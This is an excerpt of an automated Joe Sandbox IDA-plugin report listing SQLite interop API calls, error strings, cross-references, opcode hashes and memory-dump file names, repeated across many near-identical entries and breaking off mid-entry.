                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
                                                                                                                                                                                                                                      • API String ID: 2981141233-2469029621
                                                                                                                                                                                                                                      • Opcode ID: 6e9053a22774951f6ad32c465444a3ce8d76d40874c4c9c1da5acbd89fb6561c
                                                                                                                                                                                                                                      • Instruction ID: bb08ee54a3ec2433afe286ef8f1e3d6f6f3a13991ba38702cbf39487aa562d31
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e9053a22774951f6ad32c465444a3ce8d76d40874c4c9c1da5acbd89fb6561c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35312372B142099FC700CFA9C881BAAB7A5EB48325F1405A8ED4DCB345FB74DA61C7A4
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,000110A4,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC6094C
                                                                                                                                                                                                                                        • Part of subcall function 6BC55240: SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,00010ED5,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,?,00000000,?,?), ref: 6BC55273
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC60945
                                                                                                                                                                                                                                      • database corruption, xrefs: 6BC60940
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC60936
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
                                                                                                                                                                                                                                      • API String ID: 2981141233-2469029621
                                                                                                                                                                                                                                      • Opcode ID: 66596acabbcf1d619804c128a8272c69dd68f576153fde0714ddfe3e77a5bcd1
                                                                                                                                                                                                                                      • Instruction ID: 67560313319cfcd87be35fcc459846acee50e1ee1bd2e457172e1be5b271f3bc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66596acabbcf1d619804c128a8272c69dd68f576153fde0714ddfe3e77a5bcd1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6631B3B5E15609ABDB14CF95C8C1FAEB3F1AF48705F10444CE595AB640F738AB84CB61
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,00010F1C,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?), ref: 6BC55222
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC5521B
                                                                                                                                                                                                                                      • database corruption, xrefs: 6BC55216
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC551D1, 6BC5520C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
                                                                                                                                                                                                                                      • API String ID: 2981141233-2469029621
                                                                                                                                                                                                                                      • Opcode ID: 7789004ec5411fbf7fa7fbaf318751435b8d301014056d96531b7ab93a01ac11
                                                                                                                                                                                                                                      • Instruction ID: 680c6aeac93d44ada484f9ea8348021e13d495e8c56e86580f4bc14135c47f7c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7789004ec5411fbf7fa7fbaf318751435b8d301014056d96531b7ab93a01ac11
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F219A73B640049FD3148B6DCC42F9BB795EB89220B1501A8EE09DB305FA34DD2283A5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC24010: _memmove.LIBCMT ref: 6BC24076
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,000353A1,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,?,6BC5BEE4,?), ref: 6BC5681E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC56817
                                                                                                                                                                                                                                      • database corruption, xrefs: 6BC56812
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC56808
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d._memmove
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
                                                                                                                                                                                                                                      • API String ID: 3148929312-2469029621
                                                                                                                                                                                                                                      • Opcode ID: 5622b03a0eeff7985893e85dac1186ec62a7c6ae0decd6f3740e7c39343e1142
                                                                                                                                                                                                                                      • Instruction ID: 48bd438f0c1be1500b6caf955a6831d4822b4b3c6d641c8d8854f19d3caafb24
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5622b03a0eeff7985893e85dac1186ec62a7c6ae0decd6f3740e7c39343e1142
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 332137729105059BDB04CF19D881B9AB7B8EF80258F1440B5DD4A9B20AF735EFB9CBD4
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000183BB,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BCC1997
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BCC1990
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BCC1981
                                                                                                                                                                                                                                      • misuse, xrefs: 6BCC198B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: 30d39108cc41bf1cbc4ff6b99be1711871d6a6c0a5a317f9af26a4bd20b1c5d6
                                                                                                                                                                                                                                      • Instruction ID: 35d8aae534d310be4c2938575170eb70fc0120671355b27b272939320415e571
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30d39108cc41bf1cbc4ff6b99be1711871d6a6c0a5a317f9af26a4bd20b1c5d6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B221C872B216245BD7108E6D9C41E6B73A8AF54625B054269ED1DEB340FB38EE1443E2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC6BD8A
                                                                                                                                                                                                                                      • database corruption, xrefs: 6BC6BD85
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC6BD7B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
                                                                                                                                                                                                                                      • API String ID: 0-2469029621
                                                                                                                                                                                                                                      • Opcode ID: 2d2c9f796e2ef549183ba6ef0d22e6b1a201a8de6afbb4cc02c4daf8d84d1b59
                                                                                                                                                                                                                                      • Instruction ID: b10e72030b289c78bcd6d2f08b252731bb513e0078c08f71be89b57f781064f6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d2c9f796e2ef549183ba6ef0d22e6b1a201a8de6afbb4cc02c4daf8d84d1b59
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C21C6767141146BD704DF68EC82DAB73A9DBC06B5B04406AFD088B245FB35ED5287E0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI1bf8975e567ea97a.SQLITE.INTEROP(?), ref: 6BC3FB85
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC3FBB1
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC3FBD1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Iaa0f8e0c251cfd1d.$I1bf8975e567ea97a.
                                                                                                                                                                                                                                      • String ID: malformed JSON
                                                                                                                                                                                                                                      • API String ID: 2044891589-4000051135
                                                                                                                                                                                                                                      • Opcode ID: f929129ca0cbeb5d052fe87a1fbec3835c57b6624e43ab491a2916f472a94a4a
                                                                                                                                                                                                                                      • Instruction ID: 63ff793286ffa0301dd890ad778e5b4c4f1cc30c4fd47625292552f8af4b56fb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f929129ca0cbeb5d052fe87a1fbec3835c57b6624e43ab491a2916f472a94a4a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E221B5F08197554FD7208F399810B137BE45F1535CF104AADE8A98B291F77DE2448B91
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00005AB8,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,?,?,?,?,6BC5B20E,00000000,?,?,?), ref: 6BC565D2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: 7b7406fb8db22c2b2474580a7269332aed9b29588e87121bc5e9b5479ed5e1ba
                                                                                                                                                                                                                                      • Instruction ID: 5086f7d412693db4329037dbd1db5b363035885d3df7513766c7086b63f37e87
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b7406fb8db22c2b2474580a7269332aed9b29588e87121bc5e9b5479ed5e1ba
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE1189726417019FFB008F28D841B427BA4FB81728F508079E9184F345F739E625CBA5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A68D,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC5826A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC58263
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC58254
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC5825E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: 31464ad42261defa231dc8e1ce77b9b3659c9852b0151be46d4a8ba19b1ccbb8
                                                                                                                                                                                                                                      • Instruction ID: fefc54bf184ec04cb05a412b5aeb69b820d05c4401286f58233895bfd79899a8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31464ad42261defa231dc8e1ce77b9b3659c9852b0151be46d4a8ba19b1ccbb8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85112972621B049FE7109B74DC81E177BA4EF40629F040169EA0ADB201E62CE92586B5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00015B0C,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC53684
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC5367D
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC5366E
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC53678
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: 96c0306230c00814c2fb35020c5a0125068df0eeef2960f8b68f34fa246f13f7
                                                                                                                                                                                                                                      • Instruction ID: b3dd67106354c554a52399d6ac7f2fbf0e9cc5749a4c07f26b1572d6f06d97d2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 96c0306230c00814c2fb35020c5a0125068df0eeef2960f8b68f34fa246f13f7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2211ECB2D1120597DB10DF74D882B5AB7A8BB80259F004065DC1E9F342FB3DDB3486E6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC54961
                                                                                                                                                                                                                                      • database corruption, xrefs: 6BC5495C
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC54952
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
                                                                                                                                                                                                                                      • API String ID: 0-2469029621
                                                                                                                                                                                                                                      • Opcode ID: e388afb6a151062a226c2af0f070b1cc65e593ad3a05626bfdee6a574d358381
                                                                                                                                                                                                                                      • Instruction ID: ddb4440691145939db07001015489714291da731d9a6b17f4230e1897397f986
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e388afb6a151062a226c2af0f070b1cc65e593ad3a05626bfdee6a574d358381
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD21CB7542C2D18EC3088F24A095EA1BBB1BF15310B0B95C9D8959F3A3E3B9C5D9C7E1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002B160,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,?,?,6BC574BE,?,?,?,?,?,00000000), ref: 6BC5748A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC57483
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC57474
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC5747E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: 2c06fa9dfaf6e67ef3c87ffc1ff66832d9a009fc5eb505ab4b709beb72933011
